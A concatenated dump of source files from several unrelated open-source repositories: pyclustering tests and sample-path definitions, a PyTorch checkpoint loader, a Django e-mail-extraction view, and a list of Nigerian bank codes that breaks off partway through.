        assert len(output_dynamic) == 11; # 10 steps plus the initial state.
def testOutputDynamicLengthStaticSimulation(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate_static(10, 10, solution = solve_type.FAST, collect_dynamic = True);
        assert len(output_dynamic) == 11; # 10 steps plus the initial state.
    def testOutputDynamicLengthStaticSimulationWithoutCollecting(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate_static(10, 10, solution = solve_type.FAST, collect_dynamic = False);
        assert len(output_dynamic) == 1; # only the final state is collected.
def testOutputDynamicLengthDynamicSimulation(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate_dynamic(solution = solve_type.FAST, collect_dynamic = True);
assert len(output_dynamic) > 1;
def testOutputDynamicLengthDynamicSimulationWithoutCollecting(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate_dynamic(solution = solve_type.FAST, collect_dynamic = False);
assert len(output_dynamic) == 1;
    def testInfoAllocationWithNoSimulation(self):
output_dynamic = sync_dynamic(None, None, None);
ensembles = output_dynamic.allocate_sync_ensembles();
assert ensembles == [];
matrix = output_dynamic.allocate_correlation_matrix();
assert matrix == [];
def testOutputDynamicCalculateOrderParameter(self):
SyncTestTemplates.templateOutputDynamicCalculateOrderParameter(False);
def testOutputDynamicCalculateLocalOrderParameter(self):
SyncTestTemplates.templateOutputDynamicCalculateLocalOrderParameter(False);
def testVisualizerOrderParameterNoFailures(self):
net = sync_network(10, ccore = False);
output_dynamic = net.simulate_static(20, 10, solution = solve_type.FAST, collect_dynamic = True);
sync_visualizer.show_order_parameter(output_dynamic);
sync_visualizer.show_order_parameter(output_dynamic, 0);
sync_visualizer.show_order_parameter(output_dynamic, 5);
sync_visualizer.show_order_parameter(output_dynamic, 5, 20);
def testVisualizeLocalOrderParameterNoFailures(self):
net = sync_network(10, ccore = False);
output_dynamic = net.simulate_static(20, 10, solution = solve_type.FAST, collect_dynamic = True);
sync_visualizer.show_local_order_parameter(output_dynamic, net);
sync_visualizer.show_local_order_parameter(output_dynamic, net, 0);
sync_visualizer.show_local_order_parameter(output_dynamic, net, 5);
sync_visualizer.show_local_order_parameter(output_dynamic, net, 5, 20);
def testVisualizerNoFailures(self):
SyncTestTemplates.templateVisualizerNoFailures(5, 10, False);
```
#### File: pyclustering/samples/definitions.py
```python
import pyclustering.samples as samples
import os
## Path to samples module.
DEFAULT_SAMPLE_PATH = samples.__path__[0] + os.sep + "samples" + os.sep
class SIMPLE_SAMPLES:
"""!
@brief The Simple Suite offers a variety of simple clustering problems.
    @details The samples are intended for unit-testing and for checking common algorithm abilities
    in order to reveal run-time problems.
"""
## Simple Sample collection path.
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "simple" + os.sep
SAMPLE_SIMPLE1 = COLLECTION_PATH + "Simple01.data"
SAMPLE_SIMPLE2 = COLLECTION_PATH + "Simple02.data"
SAMPLE_SIMPLE3 = COLLECTION_PATH + "Simple03.data"
SAMPLE_SIMPLE4 = COLLECTION_PATH + "Simple04.data"
SAMPLE_SIMPLE5 = COLLECTION_PATH + "Simple05.data"
SAMPLE_SIMPLE6 = COLLECTION_PATH + "Simple06.data"
SAMPLE_SIMPLE7 = COLLECTION_PATH + "Simple07.data"
SAMPLE_SIMPLE8 = COLLECTION_PATH + "Simple08.data"
SAMPLE_SIMPLE9 = COLLECTION_PATH + "Simple09.data"
SAMPLE_SIMPLE10 = COLLECTION_PATH + "Simple10.data"
SAMPLE_SIMPLE11 = COLLECTION_PATH + "Simple11.data"
SAMPLE_SIMPLE12 = COLLECTION_PATH + "Simple12.data"
SAMPLE_SIMPLE13 = COLLECTION_PATH + "Simple13.data"
SAMPLE_SIMPLE14 = COLLECTION_PATH + "Simple14.data"
SAMPLE_SIMPLE15 = COLLECTION_PATH + "Simple15.data"
SAMPLE_ELONGATE = COLLECTION_PATH + "Elongate.data"
class SIMPLE_ANSWERS:
"""!
@brief Proper clustering results of samples from 'SIMPLE_SAMPLES'.
@see SIMPLE_SAMPLES
"""
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "simple" + os.sep
ANSWER_SIMPLE1 = COLLECTION_PATH + "Simple01.answer"
ANSWER_SIMPLE2 = COLLECTION_PATH + "Simple02.answer"
ANSWER_SIMPLE3 = COLLECTION_PATH + "Simple03.answer"
ANSWER_SIMPLE4 = COLLECTION_PATH + "Simple04.answer"
ANSWER_SIMPLE5 = COLLECTION_PATH + "Simple05.answer"
ANSWER_SIMPLE6 = COLLECTION_PATH + "Simple06.answer"
ANSWER_SIMPLE7 = COLLECTION_PATH + "Simple07.answer"
ANSWER_SIMPLE8 = COLLECTION_PATH + "Simple08.answer"
ANSWER_SIMPLE9 = COLLECTION_PATH + "Simple09.answer"
ANSWER_SIMPLE10 = COLLECTION_PATH + "Simple10.answer"
ANSWER_SIMPLE11 = COLLECTION_PATH + "Simple11.answer"
ANSWER_SIMPLE12 = COLLECTION_PATH + "Simple12.answer"
ANSWER_SIMPLE13 = COLLECTION_PATH + "Simple13.answer"
ANSWER_SIMPLE14 = COLLECTION_PATH + "Simple14.answer"
ANSWER_SIMPLE15 = COLLECTION_PATH + "Simple15.answer"
ANSWER_ELONGATE = COLLECTION_PATH + "Elongate.answer"
class FCPS_SAMPLES:
"""!
@brief The Fundamental Clustering Problems Suite (FCPS) offers a variety of clustering problems any algorithm
shall be able to handle when facing real world data.
@details FCPS serves as an elementary benchmark for clustering algorithms. FCPS consists of data sets with known
a priori classifications that are to be reproduced by the algorithm. All data sets are intentionally created
to be simple and might be visualized in two or three dimensions.
"""
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "fcps" + os.sep
SAMPLE_ATOM = COLLECTION_PATH + "Atom.data"
SAMPLE_CHAINLINK = COLLECTION_PATH + "Chainlink.data"
SAMPLE_ENGY_TIME = COLLECTION_PATH + "EngyTime.data"
SAMPLE_GOLF_BALL = COLLECTION_PATH + "GolfBall.data"
SAMPLE_HEPTA = COLLECTION_PATH + "Hepta.data"
SAMPLE_LSUN = COLLECTION_PATH + "Lsun.data"
SAMPLE_TARGET = COLLECTION_PATH + "Target.data"
SAMPLE_TETRA = COLLECTION_PATH + "Tetra.data"
SAMPLE_TWO_DIAMONDS = COLLECTION_PATH + "TwoDiamonds.data"
SAMPLE_WING_NUT = COLLECTION_PATH + "WingNut.data"
class FAMOUS_SAMPLES:
"""!
    @brief The famous suite offers a variety of popular datasets that are mentioned in articles, books, etc.
"""
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "famous" + os.sep
SAMPLE_OLD_FAITHFUL = COLLECTION_PATH + "OldFaithful.data"
SAMPLE_IRIS = COLLECTION_PATH + "Iris.data"
class FAMOUS_ANSWERS:
"""!
@brief Proper clustering results of samples from 'FAMOUS_SAMPLES'.
@see FAMOUS_SAMPLES
"""
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "famous" + os.sep
ANSWER_IRIS = COLLECTION_PATH + "Iris.answer"
class GRAPH_SIMPLE_SAMPLES:
GRAPH_BROKEN_CIRCLE1 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphBrokenCircle1.grpr"
GRAPH_BROKEN_CIRCLE2 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphBrokenCircle2.grpr"
GRAPH_FIVE_POINTED_FRAME_STAR = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphFivePointedFrameStar.grpr"
GRAPH_FIVE_POINTED_STAR = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphFivePointedStar.grpr"
GRAPH_ONE_CIRCLE1 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneCircle1.grpr"
GRAPH_ONE_CIRCLE2 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneCircle2.grpr"
GRAPH_ONE_CIRCLE3 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneCircle3.grpr"
GRAPH_ONE_CROSSROAD = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneCrossroad.grpr"
GRAPH_ONE_LINE = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneLine.grpr"
GRAPH_TWO_CROSSROADS = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphTwoCrossroads.grpr"
GRAPH_FULL1 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphFull1.grpr"
GRAPH_FULL2 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphFull2.grpr"
GRAPH_SIMPLE1 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphSimple1.grpr"
GRAPH_SIMPLE2 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphSimple2.grpr"
GRAPH_SIMPLE3 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphSimple3.grpr"
class IMAGE_SIMPLE_SAMPLES:
IMAGE_SIMPLE01 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple01.png"
IMAGE_SIMPLE02 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple02.png"
IMAGE_SIMPLE03 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple03.png"
IMAGE_SIMPLE04 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple04.png"
IMAGE_SIMPLE05 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple05.png"
IMAGE_SIMPLE06 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple06.png"
IMAGE_SIMPLE07 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple07.png"
IMAGE_SIMPLE08 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple08.png"
IMAGE_SIMPLE09 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple09.png"
IMAGE_SIMPLE10 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple10.png"
IMAGE_SIMPLE11 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple11.png"
IMAGE_SIMPLE12 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple12.png"
IMAGE_SIMPLE13 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple13.png"
IMAGE_SIMPLE14 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple14.png"
IMAGE_SIMPLE15 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple15.png"
IMAGE_SIMPLE16 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple16.png"
IMAGE_SIMPLE17 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple17.png"
IMAGE_SIMPLE18 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple18.png"
IMAGE_SIMPLE_BEACH = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimpleBeach.png"
IMAGE_SIMPLE_BUILDING = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimpleBuilding.png"
IMAGE_SIMPLE_FRUITS = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimpleFruits.png"
IMAGE_SIMPLE_FRUITS_SMALL = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimpleFruitsSmall.png"
IMAGE_THIN_BLACK_LINES01 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageThinBlackLines01.png"
IMAGE_THIN_BLACK_LINES02 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageThinBlackLines02.png"
IMAGE_THIN_BLACK_LINES03 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageThinBlackLines03.png"
class IMAGE_MAP_SAMPLES:
IMAGE_WHITE_SEA = samples.__path__[0] + os.sep + "images" + os.sep + "ImageWhiteSea.png"
IMAGE_WHITE_SEA_SMALL = samples.__path__[0] + os.sep + "images" + os.sep + "ImageWhiteSeaSmall.png"
IMAGE_NILE = samples.__path__[0] + os.sep + "images" + os.sep + "ImageNile.png"
IMAGE_NILE_SMALL = samples.__path__[0] + os.sep + "images" + os.sep + "ImageNileSmall.png"
IMAGE_BUILDINGS = samples.__path__[0] + os.sep + "images" + os.sep + "ImageBuildings.png"
class IMAGE_REAL_SAMPLES:
IMAGE_FIELD_FLOWER = samples.__path__[0] + os.sep + "images" + os.sep + "ImageFieldFlower.png"
IMAGE_FIELD_TREE = samples.__path__[0] + os.sep + "images" + os.sep + "ImageFieldTree.png"
class IMAGE_SYMBOL_SAMPLES:
@staticmethod
def GET_LIST_IMAGE_SAMPLES(symbol):
default_path = samples.__path__[0] + os.sep + "images" + os.sep + "symbols" + os.sep
number_sample_symbols = 1
name_file_pattern = "Symbol_%s_Sample%.2d.png"
list_image_samples = []
for index_image in range(1, number_sample_symbols + 1, 1):
file_path = default_path + (name_file_pattern % (symbol, index_image))
list_image_samples.append(file_path)
return list_image_samples
LIST_IMAGES_SYMBOL_A = GET_LIST_IMAGE_SAMPLES.__func__('A')
LIST_IMAGES_SYMBOL_B = GET_LIST_IMAGE_SAMPLES.__func__('B')
LIST_IMAGES_SYMBOL_C = GET_LIST_IMAGE_SAMPLES.__func__('C')
LIST_IMAGES_SYMBOL_D = GET_LIST_IMAGE_SAMPLES.__func__('D')
LIST_IMAGES_SYMBOL_E = GET_LIST_IMAGE_SAMPLES.__func__('E')
LIST_IMAGES_SYMBOL_F = GET_LIST_IMAGE_SAMPLES.__func__('F')
LIST_IMAGES_SYMBOL_G = GET_LIST_IMAGE_SAMPLES.__func__('G')
LIST_IMAGES_SYMBOL_H = GET_LIST_IMAGE_SAMPLES.__func__('H')
LIST_IMAGES_SYMBOL_I = GET_LIST_IMAGE_SAMPLES.__func__('I')
LIST_IMAGES_SYMBOL_J = GET_LIST_IMAGE_SAMPLES.__func__('J')
LIST_IMAGES_SYMBOL_K = GET_LIST_IMAGE_SAMPLES.__func__('K')
LIST_IMAGES_SYMBOL_L = GET_LIST_IMAGE_SAMPLES.__func__('L')
LIST_IMAGES_SYMBOL_M = GET_LIST_IMAGE_SAMPLES.__func__('M')
LIST_IMAGES_SYMBOL_N = GET_LIST_IMAGE_SAMPLES.__func__('N')
LIST_IMAGES_SYMBOL_O = GET_LIST_IMAGE_SAMPLES.__func__('O')
LIST_IMAGES_SYMBOL_P = GET_LIST_IMAGE_SAMPLES.__func__('P')
LIST_IMAGES_SYMBOL_Q = GET_LIST_IMAGE_SAMPLES.__func__('Q')
LIST_IMAGES_SYMBOL_R = GET_LIST_IMAGE_SAMPLES.__func__('R')
LIST_IMAGES_SYMBOL_S = GET_LIST_IMAGE_SAMPLES.__func__('S')
LIST_IMAGES_SYMBOL_T = GET_LIST_IMAGE_SAMPLES.__func__('T')
LIST_IMAGES_SYMBOL_U = GET_LIST_IMAGE_SAMPLES.__func__('U')
LIST_IMAGES_SYMBOL_V = GET_LIST_IMAGE_SAMPLES.__func__('V')
LIST_IMAGES_SYMBOL_W = GET_LIST_IMAGE_SAMPLES.__func__('W')
LIST_IMAGES_SYMBOL_X = GET_LIST_IMAGE_SAMPLES.__func__('X')
LIST_IMAGES_SYMBOL_Y = GET_LIST_IMAGE_SAMPLES.__func__('Y')
LIST_IMAGES_SYMBOL_Z = GET_LIST_IMAGE_SAMPLES.__func__('Z')
class IMAGE_DIGIT_SAMPLES:
@staticmethod
def GET_LIST_IMAGE_SAMPLES(digit):
default_path = samples.__path__[0] + os.sep + "images" + os.sep + "digits" + os.sep
number_sample_digits = 25
name_file_pattern = "Digit_%d_Sample%.2d.png"
list_image_samples = []
for index_image in range(1, number_sample_digits + 1, 1):
file_path = default_path + (name_file_pattern % (digit, index_image))
list_image_samples.append(file_path)
return list_image_samples
LIST_IMAGES_DIGIT_0 = GET_LIST_IMAGE_SAMPLES.__func__(0)
LIST_IMAGES_DIGIT_1 = GET_LIST_IMAGE_SAMPLES.__func__(1)
LIST_IMAGES_DIGIT_2 = GET_LIST_IMAGE_SAMPLES.__func__(2)
LIST_IMAGES_DIGIT_3 = GET_LIST_IMAGE_SAMPLES.__func__(3)
LIST_IMAGES_DIGIT_4 = GET_LIST_IMAGE_SAMPLES.__func__(4)
LIST_IMAGES_DIGIT_5 = GET_LIST_IMAGE_SAMPLES.__func__(5)
LIST_IMAGES_DIGIT_6 = GET_LIST_IMAGE_SAMPLES.__func__(6)
LIST_IMAGES_DIGIT_7 = GET_LIST_IMAGE_SAMPLES.__func__(7)
LIST_IMAGES_DIGIT_8 = GET_LIST_IMAGE_SAMPLES.__func__(8)
LIST_IMAGES_DIGIT_9 = GET_LIST_IMAGE_SAMPLES.__func__(9)
```
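The sample classes above resolve to absolute file paths inside the installed package; a short sketch of how they are consumed (using read_sample, as the tests above do):

```python
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample

# Each constant is a path string; read_sample parses the file into a list of points.
points = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
print(len(points), points[0])  # e.g. 10 points, each a list of coordinates
```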
#### File: pyclustering/tests/tests_runner.py
```python
import enum
import sys
import unittest
import warnings
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.tests.suite_holder import suite_holder
from pyclustering import __PYCLUSTERING_ROOT_DIRECTORY__
class pyclustering_integration_tests(suite_holder):
def __init__(self):
super().__init__()
pyclustering_integration_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(integration_suite):
integration_suite.addTests(unittest.TestLoader().discover(__PYCLUSTERING_ROOT_DIRECTORY__, "it_*.py"))
class pyclustering_unit_tests(suite_holder):
def __init__(self):
super().__init__()
pyclustering_unit_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(unit_suite):
unit_suite.addTests(unittest.TestLoader().discover(__PYCLUSTERING_ROOT_DIRECTORY__, "ut_*.py"))
class pyclustering_tests(suite_holder):
def __init__(self):
super().__init__()
pyclustering_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(pyclustering_suite):
pyclustering_integration_tests.fill_suite(pyclustering_suite)
pyclustering_unit_tests.fill_suite(pyclustering_suite)
class exit_code(enum.IntEnum):
    success = 0
    error_unknown_type_test = -1
    error_too_many_arguments = -2
    error_failure = -3
class tests_runner:
@staticmethod
def run():
result = None
return_code = exit_code.success
warnings.filterwarnings('ignore', 'Matplotlib is currently using agg, which is a non-GUI backend, so cannot show the figure.')
if len(sys.argv) == 1:
result = pyclustering_tests().run()
elif len(sys.argv) == 2:
if sys.argv[1] == "--integration":
result = pyclustering_integration_tests().run()
elif sys.argv[1] == "--unit":
result = pyclustering_unit_tests().run()
elif sys.argv[1] == "test":
result = pyclustering_tests().run()
else:
print("Unknown type of test is specified '" + str(sys.argv[1]) + "'.")
return_code = exit_code.error_unknown_type_test
else:
print("Too many arguments '" + str(len(sys.argv)) + "' is used.")
return_code = exit_code.error_too_many_arguments
# Get execution result
if result is not None:
if result.wasSuccessful() is False:
return_code = exit_code.error_failure
        sys.exit(return_code)
```
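The runner dispatches on `sys.argv`; a minimal entry-point sketch (the script name below is hypothetical):

```python
# run_tests.py -- hypothetical wrapper; flags are forwarded via sys.argv:
#   python run_tests.py                -> full suite
#   python run_tests.py --unit         -> unit tests only
#   python run_tests.py --integration  -> integration tests only
from pyclustering.tests.tests_runner import tests_runner

if __name__ == '__main__':
    tests_runner.run()
```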
#### File: pyclustering/utils/color.py
```python
class color:
"""!
    @brief Contains titles of colors that are used by pyclustering for visualization.
"""
@staticmethod
def get_color(sequential_index):
"""!
        @brief Returns a color using round-robin selection to avoid an out-of-range exception.
@param[in] sequential_index (uint): Index that should be converted to valid color index.
@return (uint) Color from list color.TITLES.
"""
return color.TITLES[sequential_index % len(color.TITLES)]
## List of color titles that are used by pyclustering for visualization.
TITLES = [ 'red', 'blue', 'darkgreen', 'gold', 'violet',
'deepskyblue', 'darkgrey', 'lightsalmon', 'deeppink', 'yellow',
'black', 'mediumspringgreen', 'orange', 'darkviolet', 'darkblue',
'silver', 'lime', 'pink', 'brown', 'bisque',
'dimgray', 'firebrick', 'darksalmon', 'chartreuse', 'skyblue',
'purple', 'fuchsia', 'palegoldenrod', 'coral', 'hotpink',
'gray', 'tan', 'crimson', 'teal', 'olive']
```
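`get_color` wraps the index with a modulo, so any non-negative index is valid; a quick check:

```python
from pyclustering.utils.color import color

# Indexes beyond len(color.TITLES) wrap around instead of raising IndexError.
palette = [color.get_color(index) for index in range(40)]
assert palette[35] == palette[0] == 'red'  # 35 % 35 == 0; TITLES has 35 entries
```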
#### File: utils/tests/__init__.py
```python
import matplotlib
matplotlib.use('Agg')
from pyclustering.tests.suite_holder import suite_holder
from pyclustering.utils.tests.integration import utils_integration_tests
from pyclustering.utils.tests.unit import utils_unit_tests
class utils_tests(suite_holder):
def __init__(self):
super().__init__()
utils_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(utils_suite):
utils_unit_tests.fill_suite(utils_suite)
utils_integration_tests.fill_suite(utils_suite)
```
#### File: tests/unit/ut_dimension.py
```python
import unittest;
# Generate images without having a window appear.
import matplotlib;
matplotlib.use('Agg');
from pyclustering.utils.dimension import dimension_info;
class DimensionUnitTest(unittest.TestCase):
def testGetDimension(self):
info = dimension_info([ [1], [2], [3], [4], [5] ]);
assert 1 == info.get_dimensions();
info = dimension_info([[1, 2], [3, 4]]);
assert 2 == info.get_dimensions();
``` |
{
"source": "JosephChenHub/DPANet",
"score": 2
} |
#### File: DPANet/lib/utils.py
```python
import time
import os
import torch
import logging as logger
from collections import OrderedDict
def load_model(model, model_file, depth_input=False, is_restore=False):
t_start = time.time()
if isinstance(model_file, str):
if not os.path.exists(model_file):
logger.warning("Model file:%s does not exist!"%model_file)
return
state_dict = torch.load(model_file, map_location=torch.device('cpu'))
if 'model' in state_dict.keys():
state_dict = state_dict['model']
else:
state_dict = model_file
t_ioend = time.time()
if is_restore:
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = 'module.' + k
new_state_dict[name] = v
state_dict = new_state_dict
if depth_input:
mean_w = state_dict['conv1.weight'].mean(dim=1, keepdim=True)
state_dict['conv1.weight'] = mean_w
model.load_state_dict(state_dict, strict=False)
ckpt_keys = set(state_dict.keys())
own_keys = set(model.state_dict().keys())
missing_keys = own_keys - ckpt_keys
unexpected_keys = ckpt_keys - own_keys
if len(missing_keys) > 0:
logger.warning('Model keys:{}, state dict: {}, missing key(s) in state_dict: {}'.format(len(own_keys), len(ckpt_keys),
', '.join('{}'.format(k) for k in missing_keys)
))
if len(unexpected_keys) > 0:
logger.warning('Unexpected key(s) in state_dict: {}'.format(
', '.join('{}'.format(k) for k in unexpected_keys)
))
del state_dict
t_end = time.time()
logger.info("Load model, Time usage:\n\tIO: {}, initialize parameters: {}".format(t_ioend - t_start, t_end - t_ioend))
return model
``` |
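A hedged usage sketch for `load_model`: the backbone and checkpoint path below are placeholders, chosen because the `depth_input` branch expects a `conv1.weight` key such as a ResNet provides:

```python
import torch.nn as nn
import torchvision.models as models  # assumption: a torchvision ResNet backbone

# The depth branch takes 1-channel input, so its first conv is rebuilt before loading;
# load_model then averages the checkpoint's RGB conv1 weights to match.
backbone = models.resnet50()
backbone.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
backbone = load_model(backbone, "checkpoints/resnet50.pth", depth_input=True)  # placeholder path
```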
{
"source": "Josephchinedu/mail-extractor",
"score": 2
} |
#### File: mail-extractor/app/views.py
```python
from django.shortcuts import render
from django.http import JsonResponse
from .forms import EmailForm
from .scripts import main
# Create your views here.
def homepageview(request):
form = EmailForm()
return render(request, "index.html", {"form": form})
def email_extractor_view(request):
    if request.method == "POST":
        textarea = request.POST.get('email-text')
        output_data = main(textarea)
        return JsonResponse({"emails": output_data}, safe=False)
    return JsonResponse({"error": "POST request required."}, status=405)
``` |
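`main` comes from `app/scripts.py`, which is not included in this dump; a plausible regex-based sketch (the pattern and de-duplication are assumptions, not the repository's actual code):

```python
# app/scripts.py -- hypothetical reconstruction
import re

EMAIL_PATTERN = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def main(text):
    """Return the unique e-mail addresses found in `text`, in order of appearance."""
    seen = []
    for address in EMAIL_PATTERN.findall(text or ""):
        if address not in seen:
            seen.append(address)
    return seen
```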
{
"source": "Josephchinedu/nigeria_bank_codes",
"score": 3
} |
#### File: nigeria_bank_codes/database/db.py
```python
def bankdb():
data = [
{
"bank_code": "000014",
"cbn_code": "044",
"name": "Access Bank Nigeria",
"bank_short_name": "access",
"disabled_for_vnuban": False
},
{
"bank_code": "000014",
"cbn_code": "063",
"name": "Access Bank Nigeria",
"bank_short_name": "access",
"disabled_for_vnuban": False
},
{
"bank_code": "000010",
"cbn_code": "050",
"name": "Ecobank Bank",
"bank_short_name": "ecobank",
"disabled_for_vnuban": None
},
{
"bank_code": "000007",
"cbn_code": "070",
"name": "Fidelity Bank",
"bank_short_name": "fidelity",
"disabled_for_vnuban": None
},
{
"bank_code": "000016",
"cbn_code": "011",
"name": "First Bank of Nigeria",
"bank_short_name": "firstbank",
"disabled_for_vnuban": None
},
{
"bank_code": "000003",
"cbn_code": "214",
"name": "First City Monument Bank",
"bank_short_name": "fcmb",
"disabled_for_vnuban": None
},
{
"bank_code": "000013",
"cbn_code": "058",
"name": "Guaranty Trust Bank",
"bank_short_name": "gtb",
"disabled_for_vnuban": None
},
{
"bank_code": "000020",
"cbn_code": "030",
"name": "Heritage Bank",
"bank_short_name": "heritage",
"disabled_for_vnuban": None
},
{
"bank_code":"090121",
"cbn_code":"50383",
"name":"<NAME>",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000027",
"cbn_code":"103",
"name":"Globus Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"060002",
"cbn_code":"911",
"name":"FBNQuest Merchant Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code": "000006",
"cbn_code": "301",
"name": "Jaiz Bank",
"bank_short_name": "jaiz",
"disabled_for_vnuban": None
},
{
"bank_code":"090097",
"cbn_code":"562",
"name":"<NAME>",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code": "000002",
"cbn_code": "082",
"name": "Keystone Bank",
"bank_short_name": "keystone",
"disabled_for_vnuban": None
},
{
"bank_code": "000008",
"cbn_code": "076",
"name": "Polaris Bank",
"bank_short_name": "PBL",
"disabled_for_vnuban": None
},
{
"bank_code": "000001",
"cbn_code": "232",
"name": "Sterling Bank",
"bank_short_name": "",
"disabled_for_vnuban": None
},
{
"bank_code": "000018",
"cbn_code": "032",
"name": "Union Bank of Nigeria",
"bank_short_name": "unionbank",
"disabled_for_vnuban": None
},
{
"bank_code": "000004",
"cbn_code": "033",
"name": "United Bank for Africa",
"bank_short_name": "uba",
"disabled_for_vnuban": None
},
{
"bank_code": "000011",
"cbn_code": "215",
"name": "Unity Bank",
"bank_short_name": "unity",
"disabled_for_vnuban": None
},
{
"bank_code": "000017",
"cbn_code": "035",
"name": "Wema Bank",
"bank_short_name": "wema",
"disabled_for_vnuban": None
},
{
"bank_code": "000015",
"cbn_code": "057",
"name": "Zenith Bank",
"bank_short_name": "zenith",
"disabled_for_vnuban": None
},
{
"bank_code":"090110",
"cbn_code":"566",
"name":"VFD MFB",
"bank_short_name":"vfd",
"disabled_for_vnuban": None
},
{
"bank_code":"000025",
"cbn_code":"102",
"name":"Titan Trust Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"090115",
"cbn_code":"51211",
"name":"TCF MFB",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000026",
"cbn_code":"302",
"name":"Taj Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000022",
"cbn_code":"100",
"name":"Suntrust Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000021",
"cbn_code":"068",
"name":"Standard Chartered Bank",
"bank_short_name":"standard-chartered",
"disabled_for_vnuban": None
},
{
"bank_code":"000012",
"cbn_code":"221",
"name":"Stanbic IBTC",
"bank_short_name":"stanbic",
"disabled_for_vnuban": None
},
{
"bank_code":"090325",
"cbn_code":"51310",
"name":"Sparkle Bank",
"bank_short_name":"SPKL",
"disabled_for_vnuban": None
},
{
"bank_code":"090175",
"cbn_code":"125",
"name":"<NAME>",
"bank_short_name":"RMB",
"disabled_for_vnuban": None
},
{
"bank_code":"000024",
"cbn_code":"502",
"name":"Rand Merchant Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000023",
"cbn_code":"101",
"name":"Providus Bank",
"bank_short_name":"providus",
"disabled_for_vnuban": None
},
{
"bank_code":"090154",
"cbn_code":"50823",
"name":"CEMCS MFB",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000009",
"cbn_code":"023",
"name":"Citibank Nigeria",
"bank_short_name":"citibankng",
"disabled_for_vnuban": None
},
{
"bank_code":"090004",
"cbn_code":"526",
"name":"Parallex MFB",
"bank_short_name":"parallex",
"disabled_for_vnuban": None
},
{
"bank_code":"060003",
"cbn_code":"561",
"name":"Nova Merchant Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"090267",
"cbn_code":"50211",
"name":"Kuda MFB",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"090380",
"cbn_code":"50200",
"name":"Kredi Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"060001",
"cbn_code":"902",
"name":"Coronation Merchant Bank",
"bank_short_name":"cmfb",
"disabled_for_vnuban": None
},
{
"bank_code":"090001",
"cbn_code":"401",
"name":"Aso Savings And Loans",
"bank_short_name":"aso-savings",
"disabled_for_vnuban": None
},
{
"bank_code":"400001",
"cbn_code":"501",
"name":"FSDH Merchant Bank",
"bank_short_name":"fsdh",
"disabled_for_vnuban": None
},
{
"bank_code":"100026",
"cbn_code":"565",
"name":"One Finance",
"bank_short_name":"",
